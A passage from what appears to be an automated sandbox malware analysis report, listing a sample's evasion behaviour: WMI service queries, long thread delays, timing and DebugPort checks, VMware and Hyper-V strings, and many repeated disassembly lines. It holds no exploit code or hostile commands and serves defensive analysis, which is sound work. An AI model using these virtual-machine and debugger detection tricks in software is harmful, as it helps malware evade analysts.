        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277D1C0 rdtsc 8_2_2277D1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5813Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4033Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5901Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3912Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.4 %
        Source: C:\Windows\SysWOW64\AtBroker.exeAPI coverage: 3.3 %
        Source: C:\Windows\System32\wscript.exe TID: 5836Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep count: 5901 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2076Thread sleep count: 3912 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5264Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CED1C0 FindFirstFileW,FindNextFileW,FindClose,11_2_02CED1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000003.2049047220.000001B66CF1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051702588.000001B66CF21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downHyper-V Time Synchronization
        Source: wscript.exe, 00000000.00000002.2051065682.000001B66AF65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`#{
        Source: wscript.exe, 00000000.00000002.2051065682.000001B66AF65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000003.2048842064.000001B66CF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000002.2051850283.000001B66CF95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
        Source: powershell.exe, 00000002.00000002.2786911923.000001CB71841000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
        Source: wscript.exe, 00000000.00000003.2048272066.000001B66CD87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemALFONS-PCvmicvss
        Source: wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: evmicheartbeatHyper-
        Source: wscript.exe, 00000000.00000003.2048272066.000001B66CD87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: wscript.exe, 00000000.00000003.2025331654.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026077213.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024611329.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051632922.000001B66CDF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049654599.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051485295.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025261904.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048239557.000001B66CDEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024942075.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024611329.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2709804128.0000000006A42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000000.00000003.2049047220.000001B66CF1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051702588.000001B66CF31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049841060.000001B66CF30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ing ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service Interface
        Source: wab.exe, 00000008.00000003.2770573941.0000000006A10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW h
        Source: wscript.exe, 00000000.00000003.2049047220.000001B66CF1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051702588.000001B66CF21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: erVirtual DiskHyper-V Guest Service Inte
        Source: wscript.exe, 00000000.00000003.2049047220.000001B66CF1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051702588.000001B66CF21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049756089.000001B66CF20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: viceHyper-V PowerShell Direct Se.hM
        Source: wab.exe, 00000008.00000003.2709804128.0000000006A42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2806420134.0000000006A42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH.
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277D1C0 rdtsc 8_2_2277D1C0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0344D7D0 LdrInitializeThunk,5_2_0344D7D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F826B mov eax, dword ptr fs:[00000030h]8_2_226F826B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22741270 mov eax, dword ptr fs:[00000030h]8_2_22741270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22741270 mov eax, dword ptr fs:[00000030h]8_2_22741270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22729274 mov eax, dword ptr fs:[00000030h]8_2_22729274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0274 mov eax, dword ptr fs:[00000030h]8_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22704260 mov eax, dword ptr fs:[00000030h]8_2_22704260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22704260 mov eax, dword ptr fs:[00000030h]8_2_22704260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22704260 mov eax, dword ptr fs:[00000030h]8_2_22704260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CD26B mov eax, dword ptr fs:[00000030h]8_2_227CD26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CD26B mov eax, dword ptr fs:[00000030h]8_2_227CD26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278D250 mov ecx, dword ptr fs:[00000030h]8_2_2278D250
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22706259 mov eax, dword ptr fs:[00000030h]8_2_22706259
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BB256 mov eax, dword ptr fs:[00000030h]8_2_227BB256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BB256 mov eax, dword ptr fs:[00000030h]8_2_227BB256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9240 mov eax, dword ptr fs:[00000030h]8_2_226F9240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9240 mov eax, dword ptr fs:[00000030h]8_2_226F9240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22788243 mov eax, dword ptr fs:[00000030h]8_2_22788243
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22788243 mov ecx, dword ptr fs:[00000030h]8_2_22788243
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273724D mov eax, dword ptr fs:[00000030h]8_2_2273724D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FA250 mov eax, dword ptr fs:[00000030h]8_2_226FA250
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F823B mov eax, dword ptr fs:[00000030h]8_2_226F823B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D5227 mov eax, dword ptr fs:[00000030h]8_2_227D5227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22737208 mov eax, dword ptr fs:[00000030h]8_2_22737208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22737208 mov eax, dword ptr fs:[00000030h]8_2_22737208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BF2F8 mov eax, dword ptr fs:[00000030h]8_2_227BF2F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227102E1 mov eax, dword ptr fs:[00000030h]8_2_227102E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227102E1 mov eax, dword ptr fs:[00000030h]8_2_227102E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227102E1 mov eax, dword ptr fs:[00000030h]8_2_227102E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F92FF mov eax, dword ptr fs:[00000030h]8_2_226F92FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED mov eax, dword ptr fs:[00000030h]8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D52E2 mov eax, dword ptr fs:[00000030h]8_2_227D52E2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272F2D0 mov eax, dword ptr fs:[00000030h]8_2_2272F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272F2D0 mov eax, dword ptr fs:[00000030h]8_2_2272F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B2C0 mov eax, dword ptr fs:[00000030h]8_2_2272B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B2C0 mov eax, dword ptr fs:[00000030h]8_2_2272B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B2C0 mov eax, dword ptr fs:[00000030h]8_2_2272B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B2C0 mov eax, dword ptr fs:[00000030h]8_2_2272B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B2C0 mov eax, dword ptr fs:[00000030h]8_2_2272B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B2C0 mov eax, dword ptr fs:[00000030h]8_2_2272B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B2C0 mov eax, dword ptr fs:[00000030h]8_2_2272B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A2C3 mov eax, dword ptr fs:[00000030h]8_2_2270A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A2C3 mov eax, dword ptr fs:[00000030h]8_2_2270A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A2C3 mov eax, dword ptr fs:[00000030h]8_2_2270A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A2C3 mov eax, dword ptr fs:[00000030h]8_2_2270A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270A2C3 mov eax, dword ptr fs:[00000030h]8_2_2270A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227092C5 mov eax, dword ptr fs:[00000030h]8_2_227092C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227092C5 mov eax, dword ptr fs:[00000030h]8_2_227092C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB2D3 mov eax, dword ptr fs:[00000030h]8_2_226FB2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB2D3 mov eax, dword ptr fs:[00000030h]8_2_226FB2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FB2D3 mov eax, dword ptr fs:[00000030h]8_2_226FB2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227892BC mov eax, dword ptr fs:[00000030h]8_2_227892BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227892BC mov eax, dword ptr fs:[00000030h]8_2_227892BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227892BC mov ecx, dword ptr fs:[00000030h]8_2_227892BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227892BC mov ecx, dword ptr fs:[00000030h]8_2_227892BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227102A0 mov eax, dword ptr fs:[00000030h]8_2_227102A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227102A0 mov eax, dword ptr fs:[00000030h]8_2_227102A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227152A0 mov eax, dword ptr fs:[00000030h]8_2_227152A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227152A0 mov eax, dword ptr fs:[00000030h]8_2_227152A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227152A0 mov eax, dword ptr fs:[00000030h]8_2_227152A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227152A0 mov eax, dword ptr fs:[00000030h]8_2_227152A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227972A0 mov eax, dword ptr fs:[00000030h]8_2_227972A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227972A0 mov eax, dword ptr fs:[00000030h]8_2_227972A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227962A0 mov eax, dword ptr fs:[00000030h]8_2_227962A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227962A0 mov ecx, dword ptr fs:[00000030h]8_2_227962A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227962A0 mov eax, dword ptr fs:[00000030h]8_2_227962A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227962A0 mov eax, dword ptr fs:[00000030h]8_2_227962A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227962A0 mov eax, dword ptr fs:[00000030h]8_2_227962A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227962A0 mov eax, dword ptr fs:[00000030h]8_2_227962A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C92A6 mov eax, dword ptr fs:[00000030h]8_2_227C92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C92A6 mov eax, dword ptr fs:[00000030h]8_2_227C92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C92A6 mov eax, dword ptr fs:[00000030h]8_2_227C92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C92A6 mov eax, dword ptr fs:[00000030h]8_2_227C92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273329E mov eax, dword ptr fs:[00000030h]8_2_2273329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273329E mov eax, dword ptr fs:[00000030h]8_2_2273329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273E284 mov eax, dword ptr fs:[00000030h]8_2_2273E284
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273E284 mov eax, dword ptr fs:[00000030h]8_2_2273E284
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22780283 mov eax, dword ptr fs:[00000030h]8_2_22780283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22780283 mov eax, dword ptr fs:[00000030h]8_2_22780283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22780283 mov eax, dword ptr fs:[00000030h]8_2_22780283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D5283 mov eax, dword ptr fs:[00000030h]8_2_227D5283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22707370 mov eax, dword ptr fs:[00000030h]8_2_22707370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22707370 mov eax, dword ptr fs:[00000030h]8_2_22707370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22707370 mov eax, dword ptr fs:[00000030h]8_2_22707370
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227A437C mov eax, dword ptr fs:[00000030h]8_2_227A437C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BF367 mov eax, dword ptr fs:[00000030h]8_2_227BF367
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FD34C mov eax, dword ptr fs:[00000030h]8_2_226FD34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FD34C mov eax, dword ptr fs:[00000030h]8_2_226FD34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278035C mov eax, dword ptr fs:[00000030h]8_2_2278035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278035C mov eax, dword ptr fs:[00000030h]8_2_2278035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278035C mov eax, dword ptr fs:[00000030h]8_2_2278035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278035C mov ecx, dword ptr fs:[00000030h]8_2_2278035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278035C mov eax, dword ptr fs:[00000030h]8_2_2278035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278035C mov eax, dword ptr fs:[00000030h]8_2_2278035C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CA352 mov eax, dword ptr fs:[00000030h]8_2_227CA352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22782349 mov eax, dword ptr fs:[00000030h]8_2_22782349
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D5341 mov eax, dword ptr fs:[00000030h]8_2_227D5341
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9353 mov eax, dword ptr fs:[00000030h]8_2_226F9353
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F9353 mov eax, dword ptr fs:[00000030h]8_2_226F9353
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C132D mov eax, dword ptr fs:[00000030h]8_2_227C132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C132D mov eax, dword ptr fs:[00000030h]8_2_227C132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272F32A mov eax, dword ptr fs:[00000030h]8_2_2272F32A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F7330 mov eax, dword ptr fs:[00000030h]8_2_226F7330
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22720310 mov ecx, dword ptr fs:[00000030h]8_2_22720310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278930B mov eax, dword ptr fs:[00000030h]8_2_2278930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278930B mov eax, dword ptr fs:[00000030h]8_2_2278930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278930B mov eax, dword ptr fs:[00000030h]8_2_2278930B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273A30B mov eax, dword ptr fs:[00000030h]8_2_2273A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273A30B mov eax, dword ptr fs:[00000030h]8_2_2273A30B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273A30B mov eax, dword ptr fs:[00000030h]8_2_2273A30B
